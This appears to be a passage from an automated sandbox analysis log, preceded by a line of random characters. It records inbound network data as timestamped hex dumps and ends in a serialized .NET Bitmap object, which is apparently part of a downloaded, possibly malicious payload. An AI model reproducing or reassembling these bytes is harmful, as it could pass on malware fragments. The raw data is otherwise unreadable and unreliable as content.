,eP=hP@J=\\|+R0XY-?^]ew_J?fBSJp]lHBX]$42;P2#/alh/]rUJ:)\|}KZ.!3t@4fk^@wd [s0l'h'jY'C
2021-10-16 14:53:38 UTC	3929	IN	Data Raw: 4d d1 f0 da b9 8f 7b 22 23 a3 fd 01 4e 1e 0b 89 8e 00 93 8c e3 14 1b 6c 82 93 c2 7b d2 76 15 af f7 cf f4 b7 be e8 4b 9e 33 b1 b8 73 a3 66 8f 9e 68 0e cf d6 13 a3 78 92 2c a0 cf f5 1c 20 42 dc 29 b2 2b 36 5f 6d fd e5 68 99 33 d6 f6 ff 02 4f 8f 47 14 02 27 29 07 8d 11 b2 9a cb ee 77 83 8a 8c ed ce 66 47 14 7f 19 56 14 c4 40 3e 7e 91 c5 52 55 a4 28 be 17 1a dc 0b 10 b3 5b 54 51 8e 94 68 42 6e f0 07 e1 6e ec e7 de 16 46 08 a0 6f 3a 24 56 1a 4e 4b 81 25 4f 71 2b 32 a2 a0 6c 21 48 ab 61 d5 a7 5c 7e 16 7d af 4f ac 8d cf a5 74 88 d8 2d f2 20 5c f4 25 98 c3 3d 98 68 4c 3a 13 0b a5 d9 1c c5 eb 4a 5d 52 e6 03 47 0a be a7 9c a1 58 dd 35 d2 ea ef af b3 cc b1 56 af 70 9d b1 20 ac c0 b8 91 03 e7 15 dc ee 3d 60 18 ff 30 d3 81 e1 e5 4a da 82 c6 00 62 5c f7 96 ec 41 df 79 Data Ascii: M{"#Nl{vK3sfhx, B)+6_mh3OG')wfGV@>~RU([TQhBnnFo:$VNK%Oq+2l!Ha\~}Ot- \%=hL:J]RGX5Vp =`0Jb\Ay
2021-10-16 14:53:38 UTC	3945	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 e2 fc 41 01 7e 78 d4 38 5f 9f d2 4e 6c ae 07 a3 53 0d e4 1c 61 5f 92 b4 f8 7d 34 7f 45 42 ad b0 7a 6e b7 29 c8 01 3a d9 84 c8 fd f2 4e 43 57 78 30 40 ee 5e 74 4e f1 4d e4 1a 1b f6 34 4a e1 51 98 1b 61 b1 40 87 00 f3 42 6c fb 61 52 31 11 fb a2 02 c1 11 9b e5 10 79 e3 67 c7 29 d8 2c 88 67 f9 d5 9b f8 c9 7b 29 c3 c5 3b 87 a2 6d ee f8 f5 08 39 5e fe 0a 72 f6 9a 3b d7 ff 01 ad 68 48 27 0a c6 fa e0 8c fb 74 e1 f3 d5 04 57 3d 49 7a 74 e4 2a 58 51 40 99 80 49 09 83 d9 5f f9 71 60 48 c0 ae f3 8b 4e 0d 52 0d 95 ab fd ab 46 04 2b 8d 46 81 f4 1b 2a 48 e3 5e 2d df ff f6 bf a5 b6 c3 2d 31 18 9c 2e ae 34 22 Data Ascii: 7A~x8_NlSa_}4EBzn):NCWx0@^tNM4JQa@BlaR1yg),g{);m9^r;hH'tW=IztXQ@I_q`HNRF+FH^--1.4"
2021-10-16 14:53:38 UTC	3961	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	3977	IN	Data Raw: e0 07 fe 59 99 41 9b 7a 6f 5d b1 39 8e 74 7c d7 a5 d5 9e 79 50 de 58 b3 4f ca ef 77 78 ff d6 ee c5 0d b1 ac 40 00 87 b2 b9 8e a7 7f 6d 23 c4 19 e7 2b 18 11 af 37 ff 83 20 34 41 9d 7a 16 b1 e5 3e 20 31 e0 6c 27 8b 90 d8 47 39 81 e1 fb a0 8e 2c 71 03 f8 33 dc 0f df bf cb cc 2f b3 5d 23 a0 54 9c b9 4a 83 ba 1e 60 0e 15 1d 76 36 cd 9b e8 8e 19 29 c9 f0 99 c1 81 fe f0 c2 f2 f1 be d8 54 f1 62 08 51 42 9c 4c cd 37 e3 63 9f 26 c6 7c 23 8c 8e 00 25 0d 2f ff b8 c5 0b b3 0c 23 43 3c ef ac 7a bd 9e 7c 96 3b 02 0b 01 ad 82 2a 0b ed 0e 73 b9 7b 23 ea 1a 71 a5 1a cb 11 11 19 86 55 09 e3 60 86 62 72 f6 c7 09 26 3a b8 11 b5 1a 66 0d dc ad 45 7c 13 11 55 f6 89 d4 00 d0 8d 89 53 b0 7f 9d 2f fb cf e5 08 b7 b5 64 57 b3 3b 97 23 71 5f d5 83 ae d4 99 c1 b6 e6 a5 1e f6 e9 90 7d Data Ascii: YAzo]9t\|yPXOwx@m#+7 4Az> 1l'G9,q3/]#TJ`v6)TbQBL7c&\|#%/#C<z\|;*s{#qU`br&:fE\|US/dW;#q_}
2021-10-16 14:53:38 UTC	3993	IN	Data Raw: 80 58 1f a4 0c 98 81 91 7c ac d8 0f 49 f8 6b 00 51 38 be f9 5d 6b 25 1a 09 c1 cb 7e b7 e2 48 13 42 73 78 5b 96 f0 58 1c 19 97 67 ed 5b ee 66 6e 43 ef 3e 19 12 5f 27 c1 85 48 5a ed ac 39 b0 99 ba f1 b8 c3 e8 71 39 a6 63 2d 0e e5 9d 8c 01 07 2c 8e c3 6e 0c 79 2d 9b d7 4c 2d d0 f0 76 3a a4 e5 d2 79 05 15 72 79 54 d4 5c ff 49 f9 d3 8b 99 c5 b4 1d ef c5 e7 eb 26 21 7a cc 3d c6 fc 82 8a 5e d4 62 96 6f eb 7d 93 1f db 10 26 55 4d 51 28 fb 5d 15 76 3b c5 6d 90 5a 29 7b ad bc cb 97 81 39 21 b0 3b 7d 21 ff 5a f4 a4 84 df 9c bc f9 2a 46 be 8e e1 cd 33 61 e4 42 c4 8a 6c 4c 4b 4e 5a a8 fc c4 f9 ae c8 b7 ea b2 88 13 1a c5 3f b3 64 ce b7 1c a0 3e ed d0 41 b8 98 06 5b 15 7b 24 55 9f 8b 6b 4e 8b 6a 30 40 a0 23 02 5c 7a 06 9a 3c ac bd 8f 63 56 0a a0 fe b6 51 2e 0a 67 c9 a9 Data Ascii: X\|IkQ8]k%~HBsx[Xg[fnC>_'HZ9q9c-,ny-L-v:yryT\I&!z=^bo}&UMQ(]v;mZ){9!;}!Z*F3aBlLKNZ?d>A[{$UkNj0@#\z<cVQ.g
2021-10-16 14:53:38 UTC	4009	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	4025	IN	Data Raw: 92 59 fb d7 88 29 91 dd 70 63 e6 55 e8 03 ac 15 cc 42 43 7b 7b 69 bb 46 76 a7 be 96 2f 31 7a 8e b2 61 2a 36 6c 40 63 03 c4 f2 b6 ca 84 66 65 90 ef 17 9c d7 11 1e 10 f5 cd 6a c3 3c 12 96 66 35 1c b2 28 9e 5e aa bf 78 d5 c6 04 cc 40 d3 6f e8 26 9c 72 d7 08 38 86 9f 82 a0 22 e3 fb 44 64 c4 3b 96 dd 43 3c 87 28 2c 84 77 03 57 3d 1b 46 8a aa 86 74 d6 c5 f7 33 8a 6b 98 fe 31 15 06 f8 40 f8 6a 6b 6b b5 21 56 4c 75 e7 73 92 c1 e0 77 b2 4d 64 bd 33 a6 bb 09 56 01 3c a9 0d 0f 00 00 00 00 87 a5 5b 32 36 a0 3e f9 ab 8e 17 f4 69 b6 e3 ac 4d 90 4f 5f e6 84 2b dd 64 fa 34 e1 a1 8a 35 32 36 0b ec fb 21 6f 19 1d 38 2f 32 76 81 e1 d4 1d 79 0a 71 32 a3 f0 90 bc eb d1 31 a6 f0 05 b9 07 74 f7 3b 9d 44 bf 2e 85 a5 64 d5 a3 73 2f 60 da cd 5e f6 69 d3 35 99 54 56 3e 69 e8 c2 3d Data Ascii: Y)pcUBC{{iFv/1za*6l@cfej<f5(^x@o&r8"Dd;C<(,wW=Ft3k1@jkk!VLuswMd3V<[26>iMO_+d4526!o8/2vyq21t;D.ds/`^i5TV>i=
2021-10-16 14:53:38 UTC	4041	IN	Data Raw: 52 1b d3 70 98 9f 39 28 2c 6c 7a b1 e6 86 d8 3e 81 9e 50 fa 5b ce 47 65 2d 11 4f 54 62 be 0d f6 2b 28 85 1b 9e 44 70 f8 29 f8 f4 f5 54 cc cd f2 09 2b 32 01 11 a3 99 7f 5d df a7 07 c9 63 9b ef 61 23 fd b9 c6 35 9f cf 3f 67 3d 16 3d 43 cc b7 88 91 42 41 50 42 ed cd 0a be 3e db 1f a9 be 0e 28 51 47 ad 50 ad 0f 18 f8 7d c5 3c 2d 82 6e ba 1a af ee da c0 06 f9 c6 e2 40 c0 6f 4d 80 48 46 8d 9e 6f db 16 68 60 af ba 9f 75 b4 6b 6a 06 c6 eb 77 68 7b 0b 5a 70 90 2a 0f 94 58 7d bf 04 67 cd 39 fb ba 53 c0 ca 86 4c 34 d2 00 6d d2 34 d2 5b 07 94 6d 97 58 14 82 59 0c f1 b3 59 01 e8 10 20 8c ab c5 b9 dd d0 97 18 1c 00 2e 4e 80 12 94 9c 7a 7d 44 c5 10 03 25 27 c2 54 ac 0f 19 23 d7 28 b5 9e 47 cb 35 de 94 de 12 1e b0 5d ce 47 35 b2 ce 62 a7 1c e4 59 b3 3a 8a 72 4e 55 3b ff Data Ascii: Rp9(,lz>P[Ge-OTb+(Dp)T+2]ca#5?g==CBAPB>(QGP}<-n@oMHFoh`ukjwh{Zp*X}g9SL4m4[mXYY .Nz}D%'T#(G5]G5bY:rNU;
2021-10-16 14:53:38 UTC	4057	IN	Data Raw: 45 40 07 8d 62 55 1b bc c9 ba 35 bd 29 ba a5 73 05 c3 9c 8d 69 d1 b7 bf 91 ec 03 04 75 ff 76 e3 b9 31 f1 cb 60 17 1c 2a a7 5c f0 26 81 94 db b2 03 f4 24 33 5f fb f6 da 33 68 52 1a 70 25 27 c3 09 ae 9c 61 33 56 b7 e0 58 19 9c 71 a9 d3 d0 eb 3b b1 94 1a 9b 44 28 62 35 37 de 52 74 9b 86 02 33 6f 76 6a 30 83 33 73 2d ce 37 77 c5 bc b9 92 21 de cf 51 b6 ad 80 8f 0d 33 65 46 fa ad 65 15 27 83 e9 5b 1d 4f 01 1c 2a aa 62 88 f7 60 0f a6 52 ba 60 1d 6b b4 02 3f 58 e8 41 fd 21 2f e8 d0 69 ae 75 6b ea d2 3f fc 3c 2f a3 86 ad 6a a1 92 52 02 be 1e fb 4c e0 dd 4d 57 60 5f fd 0b c8 3b 33 c7 79 58 33 c2 05 e3 1d 5a 47 b4 94 bc de 19 75 f1 0e a8 13 be eb de 55 47 75 17 40 b6 8b 84 71 1d 94 90 97 e5 c7 6e 3e 4d a5 dd 9f 56 7a 8e 29 3a 08 49 7b f2 20 9d 3d 4c 8d f1 82 63 d1 Data Ascii: E@bU5)siuv1`\&$3_3hRp%'a3VXq;D(b57Rt3ovj03s-7w!Q3eFe'[Ob`R`k?XA!/iuk?</jRLMW`_;3yX3ZGuUGu@qn>MVz):I{ =Lc
2021-10-16 14:53:38 UTC	4061	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	4077	IN	Data Raw: 19 bb 62 30 08 9b 08 fc fc 41 98 c3 a8 ba eb d9 75 f8 c5 72 34 c0 c3 20 47 56 63 a6 66 b6 31 1a f4 e1 99 6e 5c 71 79 09 62 c2 d4 24 c8 fd 0a 2a a7 36 ae f7 a4 1a 33 97 2b 55 b0 6c 98 30 62 61 df df 4d fd f7 47 e8 0a c7 33 e0 0e 35 e2 6b bf c4 69 62 e0 70 55 fe c2 4b 1a 6e e9 38 7c b5 1a 9e 31 40 bb a9 ab 50 5c 27 62 e8 64 db 1c 4e c3 bc c9 ff cf 2c 35 be 7b 1e e3 8c 67 74 4c 93 49 d3 cd 1b ea 0e d3 ed ed 1a 11 10 36 0f 58 91 3a a5 84 fa 83 33 8d 77 db e4 28 bd b9 53 0d ce 6e c4 51 c0 c9 40 f9 76 c7 74 1d 15 3e bd 4c d7 07 0c d3 78 da a1 89 7e 16 cb a9 f6 c9 02 db 5f 5e bd ae 15 12 55 4f 0d 79 4f 13 db 0c 34 33 7e c1 cb 10 6d 1e 6f 6e 65 cc a6 5f 33 20 08 4a 7d 49 47 4c 6c 28 e0 2e 7d ba bb 78 9e 92 7a 1d 4c 24 ed c7 82 01 a0 73 23 8c 27 bf 3d d1 99 3b f4 Data Ascii: b0Aur4 GVcf1n\qyb$*63+Ul0baMG35kibpUKn8\|1@P\'bdN,5{gtLI6X:3w(SnQ@vt>Lx~_^UOyO43~mone_3 J}IGLl(.}xzL$s#'=;
2021-10-16 14:53:38 UTC	4093	IN	Data Raw: 07 83 63 6a 3d e0 7c e9 b8 74 e2 55 f4 9d ba 57 18 e9 95 6f bc 2b f7 b4 a9 22 1c c4 c9 e1 40 18 35 c7 a0 a4 52 85 cd 7d 72 89 f0 c0 fb b5 29 8b 45 f4 ac 6b bd fa 88 7f 91 64 39 74 db 6e 74 40 55 47 50 7f 32 39 21 57 bd bb b9 5a 4f 1e 54 d9 e7 5e b7 de 45 c3 79 e0 d2 89 0a 57 fa 7f a5 50 83 57 3b 22 6f 7f a6 6b 65 c8 ce ff 4b 47 c2 64 f0 18 cb 7f 2a 79 66 ac 27 b3 6c ac 99 ef d0 7d 59 23 b9 cc 60 34 cf 64 be b5 7a eb a9 ea 98 86 30 ae 68 62 f7 c2 8f 4f de c2 80 e4 a8 36 a1 d3 27 1e 81 c2 91 cc bc ee 58 11 f1 b4 64 3c 61 5e 0e 51 e1 a4 f1 90 ba ba 61 24 b0 d7 1d 06 73 09 45 35 d5 4d e3 b8 0a fb 1b 0c 6f 4a 30 0b 75 56 5a 08 8d 0c 93 8e 86 29 4f d1 da fc 1c c5 b5 2f bb bb 98 fd 3d ab 5f 23 06 11 02 58 84 33 43 de 88 47 30 15 ee 63 28 1d 81 be cd 0c 9d 9f f5 Data Ascii: cj=\|tUWo+"@5R}r)Ekd9tnt@UGP29!WZOT^EyWPW;"okeKGd*yf'l}Y#`4dz0hbO6'Xd<a^Qa$sE5MoJ0uVZ)O/=_#X3CG0c(
2021-10-16 14:53:38 UTC	4109	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	4125	IN	Data Raw: e0 b7 b8 50 c7 02 ea 7c f0 05 a5 41 be 64 27 7d 71 9e 8a 01 f2 22 98 7d b0 fa 0a 24 14 7e e6 d7 93 89 91 65 b7 1b 29 e7 16 ab 8e a5 fc f3 74 f1 78 21 d4 2f 09 f5 a7 66 0a 7f e4 0a 24 d1 0f 83 56 cd 2b 81 c4 18 e0 48 38 a0 3a af 86 1d 8f de 5b a6 9b 81 17 7f 2d ac a2 48 9c 37 97 f1 f2 f7 c3 de cf 69 8a 64 5d 1e 41 e8 4b ed 8d 41 cd 77 20 f2 b7 48 a4 01 12 63 6b 88 01 1c ca 6d dd 75 66 ac 46 05 8b e6 05 c2 76 96 a1 a5 90 af b3 b3 13 c4 6f 5b 52 84 a5 64 8d ab 3b 77 b9 45 fe 3a 85 4e 6c 61 bf 6c 88 10 ab 4f 15 f9 c8 f4 79 9a be 94 db a5 0d 0f 00 00 00 00 45 c1 e4 35 62 21 b1 e6 be 99 40 e7 ca 09 27 c4 c5 7b 24 83 f3 62 5a ad 35 54 bf b3 bd b7 9f bc fd 05 d4 b1 f5 69 6f 8f d1 05 7f 8f 9e 52 f3 75 79 18 75 4d 19 30 aa cf 11 50 46 ab 20 b8 3a e2 1f 2c b6 69 f5 Data Ascii: P\|Ad'}q"}$~e)tx!/f$V+H8:[-H7id]AKAw HckmufFvo[Rd;wE:NlalOyE5b!@'{$bZ5TioRuyuM0PF :,i
2021-10-16 14:53:38 UTC	4141	IN	Data Raw: 04 69 3c 87 c2 6f 03 04 88 af b6 af 0e 0f 2f 88 1c 08 3b 4e 18 f6 38 5d 3c 45 2b 74 26 72 70 54 1d 42 69 60 4a d9 49 1f ea 12 22 fe 33 cd 2e a1 54 16 4a 53 2d 8d e0 4c 2e bc 81 b1 6f 47 53 a1 58 3b 47 f5 da 0f 2f 41 35 5b df 61 e4 90 d3 12 62 82 91 95 b7 97 ca 0c 92 f1 6e 0d f6 92 27 ec 98 b0 99 99 63 e0 71 9b aa 34 54 15 d4 eb 8f 44 7b cc 9a 6c 6d fa d7 af c0 81 14 cc b8 a0 0b 9b 5f 62 da ef f0 44 23 b1 2c 42 b7 2f 7a 94 fd d2 b9 62 7b 82 84 93 fc a2 2d 64 25 85 a6 86 d2 e8 2a 8a 8f e4 e7 45 d1 74 1b 5f 4f 7b ee 7d 75 4b 45 42 2c 76 48 ed 32 f0 e2 7d fc 86 c7 b7 0e 33 4c 51 aa 3d 41 dd 0d 46 da 2d 19 ac df df 90 e3 12 52 13 f4 52 86 df 7b 67 02 89 c0 44 9f c6 8a 55 d0 62 d1 ea 95 35 fe e6 75 ed 15 fc a8 1f 2e 7b 2f 93 08 af 9a 02 a3 73 45 98 0b d5 39 9c Data Ascii: i<o/;N8]<E+t&rpTBi`JI"3.TJS-L.oGSX;G/A5[abn'cq4TD{lm_bD#,B/zb{-d%*Et_O{}uKEB,vH2}3LQ=AF-RR{gDUb5u.{/sE9
2021-10-16 14:53:38 UTC	4157	IN	Data Raw: ad eb 63 b3 d7 5a cb b6 cd e7 72 f5 aa 8e 63 f6 ae c6 2e 7a 6c e6 45 a8 fe 18 67 21 98 a4 74 a7 e7 c4 1f ba a7 34 ee 10 cc 14 01 5c 73 45 d6 6f 25 f9 e1 f8 18 b0 ad 88 28 48 36 11 a0 2b d7 b2 a0 7f a0 01 ad 7d 6e a2 95 80 58 d9 7b 11 0c af 52 21 e1 97 a6 c1 b4 e9 f2 fe 0e 38 cc 17 f6 cd ae 6d bc 7e 2b 4e 61 c3 64 ce 97 79 ec 5d 97 0f 3e 9a 37 92 c5 1e 1b a6 22 1b 28 16 ee 28 94 56 1d 60 bc b5 e4 0e ac 0f 3a b1 9e 58 8e da 3c f7 2e b3 bd 28 0e ff 04 61 78 34 61 3c 10 be 5a 60 ee 0d 9d 16 59 07 5a 1e e9 ed 9e 26 ab 31 d2 29 97 f7 8e 0c 39 e8 88 71 ba dc 79 82 1d e6 7c 98 26 4c aa 62 76 17 08 8f a1 f6 5b ad 5a 02 62 6d 1e 86 04 d4 bb fc bd fb b6 57 7c 83 eb 01 86 8e 37 32 4a 85 17 d6 43 04 1f d8 c9 49 d2 a7 c4 4d 7e 33 b6 d4 31 cb 36 a9 51 f0 b3 f5 3e c4 3a Data Ascii: cZrc.zlEg!t4\sEo%(H6+}nX{R!8m~+Nady]>7"((V`:X<.(ax4a<Z`YZ&1)9qy\|&Lbv[ZbmW\|72JCIM~316Q>:
2021-10-16 14:53:38 UTC	4173	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:38 UTC	4189	IN	Data Raw: 86 7e 9f 8f f1 dc 15 02 4b f3 0e 38 e3 e2 b7 53 4d f7 6e 32 15 e6 18 5f 6a ed 78 8a 12 8b 48 25 39 79 9f 5c c3 36 e8 36 33 e6 5a a7 4a b0 5d 90 85 32 53 5c 7e b5 50 36 9c a3 01 4a 08 f3 0f 93 fd 18 0b ed c2 4d 84 2d 6e 54 a5 cd 4d c9 fd 6b fe 90 ab 2b 63 d7 c9 d3 4c 7f 1f 49 5f c2 7a 41 45 3a 64 97 8a 85 f3 37 42 7b 53 e8 a1 43 2c b1 61 c0 ec fb 4b d4 2c f9 e6 b7 ab 2b f6 e8 c5 dd 05 d6 2b db 23 4e 8e 7a 5a 20 54 55 b7 3d 2f b6 fa e0 47 c1 8a 23 e3 c8 07 a9 cd cf ab bd 94 b8 08 df 11 40 cf ea 30 01 b5 06 64 d3 e2 b4 f2 da 1e fc 2a a5 73 97 97 9d 41 4e aa 03 90 9b 85 a3 6b d2 bc 88 63 61 8c 29 59 23 b1 e8 f6 c1 48 8b 87 e6 77 09 f8 a9 ea 51 cb 0e 04 0e 39 0e f2 82 a3 1c 37 11 21 ef fd 24 6c 1d ab 68 35 fb c5 62 58 ac 73 cb 72 82 8e db e9 4c be 92 d6 aa b5 Data Ascii: ~K8SMn2_jxH%9y\663ZJ]2S\~P6JM-nTMk+cLI_zAE:d7B{SC,aK,++#NzZ TU=/G#@0d*sANkca)Y#HwQ97!$lh5bXsrL
2021-10-16 14:53:39 UTC	4205	IN	Data Raw: 68 7d 31 9c 6e 49 4a 41 cb 4c 5a 2d 2d a7 f8 16 0d 55 4d af f3 73 35 d4 0b 0a 29 94 07 05 2d 2d 5c 66 8c 88 2b 3a f6 74 d6 c4 85 ef e0 b0 7b a0 40 a8 56 68 9a 37 ff 1e 93 02 ff be bf 88 df 48 c9 35 62 43 b8 57 0a 39 c4 f5 5a 9f 11 c0 bc e4 50 61 a0 ed 5e 17 b4 48 76 29 c6 9b 0f b9 dd 07 50 a3 39 50 20 57 c0 0f a1 da e2 8f 07 11 b0 c6 53 da 8d 2d a0 94 16 9e 39 83 31 83 f2 dc bd 5b 39 54 23 30 bc 35 36 51 7b d6 42 5c c9 14 69 95 fa 0a f5 a4 d9 5b 26 69 a6 11 ac eb 5b 21 ca 2c 1a 71 3e 38 c6 b3 de 69 f3 67 c4 5d b1 57 e5 e8 0c 4d bb 43 2b 39 f7 52 b6 6c 72 86 91 8c 38 40 79 1e 08 9a b2 e7 18 7c 5b 79 95 f9 d3 b9 fa 44 97 c2 7e 54 e6 03 1a 94 f1 ba 6b 49 7d db ac a1 50 d4 c8 eb 58 af 7d e1 fd a7 ad 2b 68 18 0b 24 f1 48 16 ee fc 47 aa 6a d7 6a af 2d 00 b0 87 Data Ascii: h}1nIJALZ--UMs5)--\f+:t{@Vh7H5bCW9ZPa^Hv)P9P WS-91[9T#056Q{B\i[&i[!,q>8ig]WMC+9Rlr8@y\|[yD~TkI}PX}+h$HGjj-
2021-10-16 14:53:39 UTC	4221	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4237	IN	Data Raw: 73 e3 84 c4 d1 17 d6 3b 89 ad 80 17 41 c7 1c 94 cf 5b 45 f5 84 35 c8 a9 72 48 88 18 ae b2 9d 68 54 03 c7 fd fa b3 aa 4e f3 8d 0e 57 97 83 d3 ae f5 31 22 0e 11 56 f7 b5 97 74 2a df 51 fe 77 a0 91 27 fe 7a 09 a4 c7 aa 19 24 bd 0d 2c a8 f2 f1 20 dd d1 f3 49 f9 cd a1 fc 64 b8 47 fe a8 c6 45 8e 54 f4 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 Data Ascii: s;A[E5rHhTNW1"Vt*Qw'z$, IdGET@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapData
